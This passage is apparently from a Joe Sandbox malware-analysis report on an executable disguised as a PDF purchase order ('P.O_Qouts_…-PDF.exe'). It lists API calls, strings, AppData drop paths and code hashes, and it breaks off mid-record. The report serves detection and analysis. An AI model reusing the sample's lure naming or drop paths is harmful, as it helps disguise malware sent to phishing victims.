                                    • C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility, xrefs: 00402230
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID: C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility
                                    • API String ID: 123533781-2092128197
                                    • Opcode ID: 963b9ea0d9772eb380fb06c0b5c4f69843d7c3b4f6846062e1ff9b626e612d96
                                    • Instruction ID: 1d5fc0eda79a0a672284adf98007a832727f4b93af1a8b9a4894ceaf33dc30f5
                                    • Opcode Fuzzy Hash: 963b9ea0d9772eb380fb06c0b5c4f69843d7c3b4f6846062e1ff9b626e612d96
                                    • Instruction Fuzzy Hash: 45510471A00208AFCB00DFE4CA88A9D7BB6EF48314F2041BAF515EB2D1DA799981CB54
                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: FileFindFirst
                                    • String ID:
                                    • API String ID: 1974802433-0
                                    • Opcode ID: 87c99d93c228253ac9c1b3c2f1ebe63b45fcf9690c0907d9fca5391973a6a56c
                                    • Instruction ID: 13e9d4e2be50c596067d6900ef2af7155ed35788a2bbd6a4100e2a10f5e5ac7a
                                    • Opcode Fuzzy Hash: 87c99d93c228253ac9c1b3c2f1ebe63b45fcf9690c0907d9fca5391973a6a56c
                                    • Instruction Fuzzy Hash: 0AF0A771604110DFD710EB649949AEE77A8DF51314F20057BF112B20C2D7B889469B2A
                                    APIs
                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B61
                                    • GetDlgItem.USER32(?,00000408), ref: 00404B6E
                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BBD
                                    • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404BD4
                                    • SetWindowLongA.USER32(?,000000FC,0040515C), ref: 00404BEE
                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C00
                                    • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C14
                                    • SendMessageA.USER32(?,00001109,00000002), ref: 00404C2A
                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C36
                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C46
                                    • DeleteObject.GDI32(00000110), ref: 00404C4B
                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C76
                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C82
                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D1C
                                    • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D4C
                                      • Part of subcall function 0040417A: SendMessageA.USER32(00000028,?,00000001,00403FAA), ref: 00404188
                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D60
                                    • GetWindowLongA.USER32(?,000000F0), ref: 00404D8E
                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404D9C
                                    • ShowWindow.USER32(?,00000005), ref: 00404DAC
                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EA7
                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F0C
                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F21
                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F45
                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F65
                                    • ImageList_Destroy.COMCTL32(00000000), ref: 00404F7A
                                    • GlobalFree.KERNEL32(00000000), ref: 00404F8A
                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405003
                                    • SendMessageA.USER32(?,00001102,?,?), ref: 004050AC
                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050BB
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004050E5
                                    • ShowWindow.USER32(?,00000000), ref: 00405133
                                    • GetDlgItem.USER32(?,000003FE), ref: 0040513E
                                    • ShowWindow.USER32(00000000), ref: 00405145
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                    • String ID: $>%{$M$N
                                    • API String ID: 2564846305-258329150
                                    • Opcode ID: 978ecd055ebf43ea6b523d6689dc18b759a0b0fdc29e4d3947c73573fc9385a9
                                    • Instruction ID: 035ac8a7469eee7f523ea9a41678d20bac9593c5f5e0b875cc373c12e4cd4a79
                                    • Opcode Fuzzy Hash: 978ecd055ebf43ea6b523d6689dc18b759a0b0fdc29e4d3947c73573fc9385a9
                                    • Instruction Fuzzy Hash: 63025DB0A00209AFDF209F94DD45AAE7BB5FB84354F50813AF610BA2E1D7799D42CF58
                                    APIs
                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040433B
                                    • GetDlgItem.USER32(00000000,000003E8), ref: 0040434F
                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040436D
                                    • GetSysColor.USER32(?), ref: 0040437E
                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040438D
                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040439C
                                    • lstrlenA.KERNEL32(?), ref: 0040439F
                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043AE
                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043C3
                                    • GetDlgItem.USER32(?,0000040A), ref: 00404425
                                    • SendMessageA.USER32(00000000), ref: 00404428
                                    • GetDlgItem.USER32(?,000003E8), ref: 00404453
                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404493
                                    • LoadCursorA.USER32(00000000,00007F02), ref: 004044A2
                                    • SetCursor.USER32(00000000), ref: 004044AB
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004044C1
                                    • SetCursor.USER32(00000000), ref: 004044C4
                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 004044F0
                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404504
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                    • String ID: : Completed$>%{$N${B@
                                    • API String ID: 3103080414-1695820862
                                    • Opcode ID: acb20318001dbc993e8a8a4388a34ea8f8254a099665a8e39094a0f64cc29e55
                                    • Instruction ID: c600905809f0113b99b24623cb0d1ad186d6442f8c09b0c76a4ffb62e5d10872
                                    • Opcode Fuzzy Hash: acb20318001dbc993e8a8a4388a34ea8f8254a099665a8e39094a0f64cc29e55
                                    • Instruction Fuzzy Hash: 5661C7B1A00209BFEB109F60CD45F6A7B69FB84714F10813AFB057A1D1C7B89951CF98
                                    APIs
                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                    • BeginPaint.USER32(?,?), ref: 00401047
                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                    • DeleteObject.GDI32(?), ref: 004010ED
                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                    • DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                    • DeleteObject.GDI32(?), ref: 00401165
                                    • EndPaint.USER32(?,?), ref: 0040116E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                    • String ID: F
                                    • API String ID: 941294808-1304234792
                                    • Opcode ID: 927d9f4f17401607196459c248a51bb8bdb5d1fd0febad51b1ec1e4e61243643
                                    • Instruction ID: f39fc87f540bacaa9a77f224585c2e26811c2c777a6195e868dd16c74e67a44d
                                    • Opcode Fuzzy Hash: 927d9f4f17401607196459c248a51bb8bdb5d1fd0febad51b1ec1e4e61243643
                                    • Instruction Fuzzy Hash: AA419D71800209AFCF058FA5DE459AF7FB9FF45315F00802AF591AA1A0CB34DA55DFA4
                                    APIs
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EC1,?,?), ref: 00405D61
                                    • GetShortPathNameA.KERNEL32(?,00422AB8,00000400), ref: 00405D6A
                                      • Part of subcall function 00405BBF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCF
                                      • Part of subcall function 00405BBF: lstrlenA.KERNEL32(00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C01
                                    • GetShortPathNameA.KERNEL32(?,00422EB8,00000400), ref: 00405D87
                                    • wsprintfA.USER32 ref: 00405DA5
                                    • GetFileSize.KERNEL32(00000000,00000000,00422EB8,C0000000,00000004,00422EB8,?,?,?,?,?), ref: 00405DE0
                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405DEF
                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E27
                                    • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,004226B8,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405E7D
                                    • GlobalFree.KERNEL32(00000000), ref: 00405E8E
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405E95
                                      • Part of subcall function 00405C5A: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe,80000000,00000003), ref: 00405C5E
                                      • Part of subcall function 00405C5A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                    • String ID: %s=%s$[Rename]
                                    • API String ID: 2171350718-1727408572
                                    • Opcode ID: 58e7088ff9b5cc87adf318d52b3a35de943ed58b69230702f7486ba729a2ba76
                                    • Instruction ID: e2b4b59c5115c054d9977882ffa936deea793db07019febf4a6c543227337bd7
                                    • Opcode Fuzzy Hash: 58e7088ff9b5cc87adf318d52b3a35de943ed58b69230702f7486ba729a2ba76
                                    • Instruction Fuzzy Hash: 39312431205B15BBD2207B65AD48F6B3A5CDF45754F14003BFA85F62C2DBBCE9028AAD
                                    APIs
                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 004063F4
                                    • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406401
                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00406406
                                    • CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00406416
                                    Strings
                                    • "C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe", xrefs: 004063D8
                                    • *?|<>/":, xrefs: 004063E4
                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040639D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Char$Next$Prev
                                    • String ID: "C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                    • API String ID: 589700163-965031679
                                    • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                    • Instruction ID: d9f0ee3981b821fe41e3526cabf2d3b5ed91aab2121061eeaaee8554b2496e7d
                                    • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                    • Instruction Fuzzy Hash: 161108518047A129FB3206384C44B777FD84F97760F1A507BE9C2722C2D67C5CA68BAD
                                    APIs
                                    • GetWindowLongA.USER32(?,000000EB), ref: 004041C9
                                    • GetSysColor.USER32(00000000), ref: 00404207
                                    • SetTextColor.GDI32(?,00000000), ref: 00404213
                                    • SetBkMode.GDI32(?,?), ref: 0040421F
                                    • GetSysColor.USER32(?), ref: 00404232
                                    • SetBkColor.GDI32(?,?), ref: 00404242
                                    • DeleteObject.GDI32(?), ref: 0040425C
                                    • CreateBrushIndirect.GDI32(?), ref: 00404266
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                    • String ID:
                                    • API String ID: 2320649405-0
                                    • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                    • Instruction ID: aaf6f474a4af46f2497c0aff4df426b114d26e681d2b1e7af029b8f8d9950092
                                    • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                    • Instruction Fuzzy Hash: 422162B16007049BCB20DF78D908F5BBBF8AF81754B048A6EF992A22E1D734E944CB54
                                    APIs
                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AB3
                                    • GetMessagePos.USER32 ref: 00404ABB
                                    • ScreenToClient.USER32(?,?), ref: 00404AD5
                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404AE7
                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Message$Send$ClientScreen
                                    • String ID: f
                                    • API String ID: 41195575-1993550816
                                    • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                    • Instruction ID: c5e689f19116b5cd7588311b3231e42886eb7a503382143ef86565be6c6ceac4
                                    • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                    • Instruction Fuzzy Hash: 98015E71A40219BADB00DBA4DD85BFFBBBCAF59711F10016BBB40B61D0C7B499458BA8
                                    APIs
                                    • GetDC.USER32(?), ref: 00401E38
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                    • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                    • CreateFontIndirectA.GDI32(0040B808), ref: 00401EBA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                    • String ID: Calibri
                                    • API String ID: 3808545654-1409258342
                                    • Opcode ID: fc9f16b01a24cae65528eb59c91fd2b9324a8e2726ec0d721fc5ceb8334f1a1e
                                    • Instruction ID: 57a26ad33cd6426129b0cba3998c620b955dd558a32440fd51a8b23e498893f8
                                    • Opcode Fuzzy Hash: fc9f16b01a24cae65528eb59c91fd2b9324a8e2726ec0d721fc5ceb8334f1a1e
                                    • Instruction Fuzzy Hash: 3E019672500240AFE7007BB0AE4A7997FF8D755301F108839F241B62F2C67800458BAC
                                    APIs
                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                    • MulDiv.KERNEL32(0009F300,00000064,0009F304), ref: 00402E00
                                    • wsprintfA.USER32 ref: 00402E10
                                    • SetWindowTextA.USER32(?,?), ref: 00402E20
                                    • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                    Strings
                                    • verifying installer: %d%%, xrefs: 00402E0A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Text$ItemTimerWindowwsprintf
                                    • String ID: verifying installer: %d%%
                                    • API String ID: 1451636040-82062127
                                    • Opcode ID: c12f5796f431ffac12d06fef0705727a44af994ad502cf00351caa1c45e3c2e6
                                    • Instruction ID: 483ea5b0a2f0e0c8b194c47557f81135a9cf1dc15d145a61dc19a9cae62ee66c
                                    • Opcode Fuzzy Hash: c12f5796f431ffac12d06fef0705727a44af994ad502cf00351caa1c45e3c2e6
                                    • Instruction Fuzzy Hash: CD014F70640209BBEF10AF60DE09EEE37A9AB04305F008039FA06A51D0DBB499559B59
                                    APIs
                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                    • GlobalFree.KERNEL32(?), ref: 0040288E
                                    • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
